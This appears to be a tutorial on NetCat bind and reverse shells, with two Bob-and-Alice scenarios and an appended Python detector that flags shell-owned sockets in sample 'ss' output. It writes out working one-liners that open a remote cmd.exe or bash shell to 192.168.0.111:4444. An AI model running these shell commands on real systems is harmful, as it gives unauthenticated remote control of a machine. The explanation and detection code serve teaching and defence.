BIND SHELL 
There are a number of ways that you can bind your shell to a port. We will use NetCat to bind a shell.
We can take cmd.exe and bind it to a local port, so that anyone who connects to that port is presented with a command prompt on that computer (no authentication is involved; whoever can reach the port gets the prompt). This is known as a BIND SHELL.
Scenario 1 :-
As always, the two fictional characters Bob and Alice are trying to connect to each other.
Suppose Bob is running a Windows machine and has a public IP through which he connects directly to the internet. Bob needs Alice's assistance (basically, remote administration of his machine).
Alice, running a Linux machine, is however behind a NAT connection and has a non-routable IP address.
So, for this to work, Bob needs to bind his cmd.exe process to a TCP port on his machine and tell Alice which port to connect to. This can be achieved using NetCat.
Bob will have to execute the following command using NetCat on his machine :-
$ nc -lvp 4444 -e cmd.exe
-lvp -> listen (-l) verbosely (-v) on the following port (-p)
-e -> execute the given program once a client connects and attach its input and output to the connection (only available in NetCat builds compiled with the -e option; many distributions ship a build without it)
This command makes the cmd.exe process available over port 4444 and redirects its stdin, stdout and stderr to that port.
Alice can now connect to Bob's IP and port from her machine, using NetCat.
$ nc -v 192.168.0.111 4444
Alice will immediately get a Windows cmd prompt from which she can manage Bob's machine, with the privileges of the user that started NetCat.
REVERSE SHELL
Scenario 2 :-
This is the reverse of scenario 1. Now suppose Alice needs Bob's assistance.
Again, as before, Alice is behind a NAT connection and Bob has a public IP, so Bob cannot connect directly to Alice's computer.
Instead, Alice can send her command prompt to Bob's machine. As far as network traffic is concerned, Alice is the one connecting to Bob's machine, which is why this works through NAT and through firewalls that allow outbound connections.
In this scenario, rather than Alice connecting to Bob's command shell, Alice sends her command shell to Bob.
Bob will first start a listener on a given port using NetCat :-
$ nc -lvp 4444
Now Alice will send her command prompt over to Bob's machine, again using NC.
This situation is different because we will be sending a Linux shell rather than a Windows cmd prompt.
So, rather than binding cmd.exe, we will be binding the bash shell.
$ nc -v 192.168.0.111 4444 -e /bin/bash
After this command, the NC listener on Bob's machine will receive the Linux shell from Alice.
Bob can now execute bash commands on Alice's machine, with the privileges of the user that ran NetCat.
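Both scenarios leave the same fingerprint on the host that hands out its shell: in scenario 1 a NetCat or shell process owns a listening socket, and in scenario 2 a shell process has its standard input/output (file descriptors 0 to 2) attached to an outbound connection. The following Python script is an added example, not part of the original post, showing how a defender can pick both patterns out of a socket listing. The `ss -tnp`-style lines are constructed sample data (not a real capture), and the lists of shell and netcat binary names are assumptions you would tune for your own hosts.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed names of interest. A shell should not normally own a network socket,
# and a netcat binary listening on a port is exactly what `nc -lvp ... -e` does.
SHELLS = {"cmd.exe", "powershell.exe", "bash", "sh", "dash", "zsh"}
NETCATS = {"nc", "ncat", "netcat", "nc.exe"}

# Matches one `ss -tnp` line; only the first process owner in the "users:" field
# is examined, which is enough to attribute the socket.
LINE_RE = re.compile(
    r'^(?P<state>LISTEN|ESTAB)\s+\d+\s+\d+\s+'
    r'(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)'
)

# Constructed sample modelled on `ss -tnp` output from the machine giving away
# its shell. The 192.168.0.111:4444 peer is the listener used in the post above.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*           users:(("sshd",pid=812,fd=3))
LISTEN 0      1      0.0.0.0:4444         0.0.0.0:*           users:(("nc",pid=2213,fd=3))
ESTAB  0      0      10.0.0.5:43210       93.184.216.34:443   users:(("firefox",pid=1503,fd=41))
ESTAB  0      0      10.0.0.5:51234       192.168.0.111:4444  users:(("bash",pid=2301,fd=0),("bash",pid=2301,fd=1),("bash",pid=2301,fd=2))
"""


@dataclass
class SocketRecord:
    state: str   # LISTEN or ESTAB
    local: str   # local address:port
    peer: str    # peer address:port ("*" for listeners)
    proc: str    # owning process name
    pid: int
    fd: int      # file descriptor the socket occupies in that process


def parse_ss(text: str) -> List[SocketRecord]:
    """Parse ss-style lines; the header and any unrecognised lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(SocketRecord(m["state"], m["local"], m["peer"],
                                        m["proc"], int(m["pid"]), int(m["fd"])))
    return records


def classify(rec: SocketRecord) -> Optional[str]:
    """Return a finding for a record that looks like a bind or reverse shell."""
    port = rec.local.rsplit(":", 1)[-1]
    # Scenario 1: a netcat or shell binary is the listener (nc -lvp 4444 -e cmd.exe).
    if rec.state == "LISTEN" and rec.proc in SHELLS | NETCATS:
        return f"bind shell suspect: {rec.proc} (pid {rec.pid}) listening on port {port}"
    # Scenario 2: a shell's stdin/stdout/stderr is the socket (nc ... -e /bin/bash).
    if rec.state == "ESTAB" and rec.proc in SHELLS and rec.fd <= 2:
        return f"reverse shell suspect: {rec.proc} (pid {rec.pid}) has fd {rec.fd} connected to {rec.peer}"
    # Weaker signal: netcat holding an outbound connection without a shell attached.
    if rec.state == "ESTAB" and rec.proc in NETCATS:
        return f"outbound netcat: {rec.proc} (pid {rec.pid}) connected to {rec.peer}"
    return None


def find_shell_sockets(text: str) -> List[str]:
    """Run the classifier over a whole listing and return the findings in order."""
    findings = []
    for rec in parse_ss(text):
        finding = classify(rec)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in find_shell_sockets(SAMPLE_SS_OUTPUT):
        print(finding)
```

Run against the sample, the script reports the port 4444 listener owned by `nc` (the bind-shell side) and the `bash` process whose fd 0 is an established connection to 192.168.0.111:4444 (the reverse-shell side), while sshd and the browser connection pass. The same two checks are what an EDR or an auditd rule keyed on a shell's file descriptors being sockets would raise; pairing them with egress filtering on the host firewall closes off the outbound case that NAT alone does not stop.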